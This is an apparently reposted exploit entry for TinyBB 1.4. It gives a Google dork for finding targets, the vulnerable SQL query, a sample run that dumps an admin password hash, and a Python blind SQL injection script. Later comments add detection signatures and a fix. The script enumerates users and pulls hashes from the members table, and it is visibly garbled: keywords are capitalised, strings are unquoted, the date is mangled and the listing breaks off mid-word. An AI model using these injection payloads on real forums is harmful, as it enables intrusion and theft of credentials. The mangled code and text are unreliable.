TinyBB is a simple free forum script. The SQL injection vulnerability in TinyBB 1.4 may cause sensitive information leakage.
# Exploit Title: TinyBB 1.4 SQL Injection + Path Disclosure
# Google Dork: "Proudly powered by TinyBB"
# Date: 7 then l 2011
# Author: swami
# Contact: flavio [dot] baldassi [at] gmail [dot] com
# Version: 1.4
# Tested on: Centos 5.5 with magic_quotes_gpc off
# Thanks to: ptrace.net
#
# From tinybb.net
#-------------------------
# "TinyBB is a free, simple bulletin board script. TinyBB's community
# is slowly growing and the number
# of installs is slowly rising. TinyBB's software is 100% free and so
# are our official add-ons."
#
# SQL Injection [Fixed]
#-----------------------
# The vulnerability exists in the /inc/viewthread.php file at line 3.
# You can see below that the $_GET[post] parameter isn't
# properly sanitized.
#
# $check_thread = mysql_query("SELECT * FROM 'tinybb_threads' WHERE
# 'thread_key' = $_GET[post]") or die(mysql_error());
#
# Path Disclosure [Not fixed]
#--------------------
# A remote user can access these files to cause the system to display
# an error message that indicates the installation path.
# 1 - http://host/inc/login.php
# 2 - http://host/inc/categories.php
#
# swami@swami-desktop:~/Documents/py$ ./tinybb.py
#
# [+] TinyBB thread url:
# http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
# [?] Set up a Proxy? [Y/n] y
# [+] Proxy ip:port: 127.0.0.1:3128
# [+] Proxy is found to be working
# [+] Testing url:
# http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
# [+] Url vulnerable: YES
# [+] Users into the db: 1
# [+] Executing blind SQL injection, this will take time...
#
# [+] UserId 76: admin: 64d7103eef2b14bbb2d0b57c38cc3fbee29ff72a
#
# [+] Done
#
#!/usr/bin/python
#
Import sys
Import urllib. request
Def banner ():
# Prints the tool's ASCII banner to stdout; no other side effects.
# NOTE(review): this listing is garbled (capitalised keywords, unquoted
# string arguments such as `Print (++)`), so it is not runnable as shown.
Print (++)
Print (| ------------------------------ |)
Print (| TinyBB 1.4 Blind SQL INjector |)
Print (| ------------------------------ |)
Print (+ by swami +)
Def setProxy (ip ):
# Builds a urllib opener that routes HTTP through the proxy given as
# `ip` (the sample run above supplies it as "ip:port") and verifies it
# with a GET to www.google.com. Returns the opener; any failure prints
# a message and exits the process with status 1.
# Detection note: the google.com fetch is the tool's connectivity check,
# so a proxy log shows it just before the thread-page requests begin.
Try:
Proxy = urllib. request. ProxyHandler ({http: // + str (ip )})
Opener = urllib. request. build_opener (proxy)
Opener. open (http://www.google.com)
Print ([+] Proxy is found to be working)
# `Except t:` is garbled, but it is clearly a catch-all: DNS failure,
# refused connection and an HTTP error status are all treated the same.
Except t:
Print ([-] Proxy doesn work)
Print ([-] Exit ...)
Sys. exit (1)
Return opener
Def testUrl (url, handle ):
# Fetches `url` through `handle` (presumably the opener returned by
# setProxy) and returns the response body decoded as UTF-8. The caller
# is not visible here, but this body looks like the "clean" baseline
# that urlVulnerable's `clean` parameter expects — confirm in main.
# Exits with status 1 on any error; the except clause is garbled but is
# a catch-all, so a 404/500 and a mistyped URL are indistinguishable.
Print ([+] Testing url: + url)
Try:
Req = handle. open (url)
Req = req. read (). decode (UTF-8)
Except t:
Print ([-] + url + is not a valid url)
Print ([-] Exit ...)
Sys. exit (1)
Return req
Def urlVulnerable (url, clean, handle ):
# Response-length oracle: requests `url` with a probe string appended
# (the literal is garbled to `""` in this listing) and reports YES when
# the reply is shorter than the `clean` baseline page — presumably the
# query errored (`or die(mysql_error())` in the advisory) and the thread
# body was not rendered. On NO it prints a message and exits with 1.
# The oracle only exists because viewthread.php interpolates the raw
# `post` parameter into SQL (see the advisory above); casting `post` to
# an integer or using a parameterised query removes the signal entirely.
Sys. stdout. write ([+] Url vulnerable :)
Try:
Req = handle. open (url + "")
Req = req. read (). decode (UTF-8)
Except t:
Sys. exit ([-] Url typing error)
# Shorter response than the baseline => the probe altered the query.
If len (clean)> len (req ):
Sys. stdout. write (YES)
Sys. stdout. flush ()
Else:
Sys. stdout. write (NO [-] Exit ...)
Sys. stdout. flush ()
Sys. exit (1)
Def getTrueValue (url, handle ):
# Fetches `url` with `%20and%201=1` appended (an always-true condition)
# and returns the length of the decoded body. getNUsers below compares
# each probe's body length against this value as its "condition true"
# reference. Unlike the other helpers, exceptions are not caught here,
# so a network error propagates as a traceback.
# Detection note: the `and 1=1` suffix on the `post` parameter is the
# signature to look for in web-server access logs.
TrueValue = handle. open (url + "% 20and % 201 = 1 ")
Return len (trueValue. read (). decode (UTF-8 ))
Def getNUsers (url, trueValue, handle ):
Users = list ()
Sys. stdout. write ([+] Users into the db :)
Sys. stdout. flush ()
For userid in range (0, 1,100 ):
Inject = url + "% 20and % 20 (SELECT % 201% 20 FROM % 20 members % 20 WHERE % 20id =" + str (userid) + ") = 1"
Try:
Req = handle. open (inject)
Req = req. read (). decode (UTF-8)
Except t:
Print ([-] Somenthing went wrong)
Sys. exit (1)
If len (req) = trueValue:
Users. append (userid)
Sys. stdout. write (str (len (users )))
Re